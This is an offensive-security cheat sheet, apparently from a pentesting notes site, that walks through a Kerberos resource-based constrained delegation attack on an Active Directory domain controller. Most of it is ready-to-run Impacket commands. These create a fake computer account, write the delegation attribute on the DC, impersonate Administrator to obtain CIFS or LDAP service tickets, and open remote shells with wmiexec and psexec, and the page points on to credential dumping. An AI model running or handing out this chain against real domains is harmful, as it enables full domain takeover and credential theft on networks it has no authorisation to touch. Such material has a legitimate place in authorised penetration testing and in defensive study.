# RBCD (Resource-Based Constrained Delegation) Attack

The Kerberos RBCD attack targets a domain computer object. Whoever can write the target's `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute can register an account they control as allowed to delegate to that computer, and then use S4U2Self/S4U2Proxy to obtain service tickets for services on that computer (CIFS, HTTP, LDAP, HOST, ...) as an arbitrary user, including domain administrators.

### Exploit <a href="#exploit" id="exploit"></a>

Reference: <https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation>

#### 0. Prerequisites <a href="#id-0-prerequisites" id="id-0-prerequisites"></a>

To achieve this attack successfully, we need the following conditions:

* A domain account with write access to the target computer object (e.g. GenericAll, GenericWrite, WriteDACL, or WriteProperty on `msDS-AllowedToActOnBehalfOfOtherIdentity`). Typical sources are the account that joined the machine to the domain or a misconfigured ACL; check with BloodHound or `dacledit`.
* A domain account that can create a computer account (by default any authenticated user can create up to `ms-DS-MachineAccountQuota` = 10), or an account we already control that has an SPN.
* LDAP (389) and SAMR (445), or LDAPS (636), access to the DC, to create the computer account and to modify the attribute.
* Kerberos (88) access to the DC, to request the tickets.

#### 1. Create Fake Computer <a href="#id-1-create-fake-computer" id="id-1-create-fake-computer"></a>

```
impacket-addcomputer -computer-name 'FAKECOMPUTER$' -computer-pass 'password123' -dc-ip 10.0.0.1 'example.local/username:password'
```

#### 2. Modify Delegation Rights <a href="#id-2-modify-delegation-rights" id="id-2-modify-delegation-rights"></a>

We can use [rbcd.py](https://github.com/tothi/rbcd-attack#abusing-kerberos-resource-based-constrained-delegation) (shipped with Impacket as `impacket-rbcd`) to abuse the `msDS-AllowedToActOnBehalfOfOtherIdentity` property of the target. `-action write` appends our fake computer's SID to the attribute's security descriptor, keeping any SIDs already present; `-action read` shows the current value and `-action remove`/`-action flush` clean up afterwards.

```
impacket-rbcd -delegate-from 'FAKECOMPUTER$' -delegate-to 'DC$' -dc-ip 10.0.0.1 -action 'write' 'example.local/username:password'
```

#### 3. Get the Impersonated Service Ticket <a href="#id-3-get-the-impersonated-service-ticket" id="id-3-get-the-impersonated-service-ticket"></a>

Service tickets obtained through S4U2Proxy give access to services on the target host as the impersonated user, e.g. CIFS (SMB shares, psexec/smbexec), HTTP (WinRM), LDAP (DCSync when the target is a DC), or HOST (scheduled tasks, WMI). Caveat: accounts in the Protected Users group or flagged "Account is sensitive and cannot be delegated" cannot be impersonated this way, so pick another privileged user if `Administrator` fails. `impacket-getST` prints the name of the ccache file it saves the ticket to.

```
impacket-getST -spn 'cifs/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
# or
impacket-getST -spn 'ldap/dc.example.local' -impersonate Administrator -dc-ip 10.0.0.1 'example.local/FAKECOMPUTER$:password123'
```

#### 4. Use the Service Ticket <a href="#id-4-use-the-service-ticket" id="id-4-use-the-service-ticket"></a>

After getting the service ticket, we can use it for further pentesting.\
Before doing that, point the `KRB5CCNAME` environment variable at the ccache file that `impacket-getST` wrote (the name is printed in its `Saving ticket in ...` line):

```
# Replace admin.ccache with the file name getST printed.
export KRB5CCNAME=`pwd`/admin.ccache

# Check by listing tickets.
# If the klist command is not found, install it with `apt install krb5-user`.
klist
```

* Login to Services with Kerberos Auth

  ```
  # -k: Use Kerberos Auth (ticket from KRB5CCNAME)
  # -no-pass: No password
  # The target must be the host name from the SPN (FQDN, not the IP or the domain),
  # so that the ticket for cifs/dc.example.local matches.
  impacket-wmiexec example.local/Administrator@dc.example.local -k -no-pass
  # A CIFS ticket is also directly usable by psexec/smbexec:
  impacket-psexec example.local/Administrator@dc.example.local -k -no-pass
  ```
* Dump credentials

  See [Dumping Windows Password Hashes](https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/dumping-windows-password-hashes/)

### References <a href="#references" id="references"></a>

* [tothi](https://github.com/tothi/rbcd-attack)
